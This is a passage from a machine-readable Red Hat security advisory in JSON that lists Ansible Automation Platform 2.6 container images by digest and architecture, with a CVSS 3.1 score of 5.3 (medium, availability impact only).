"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
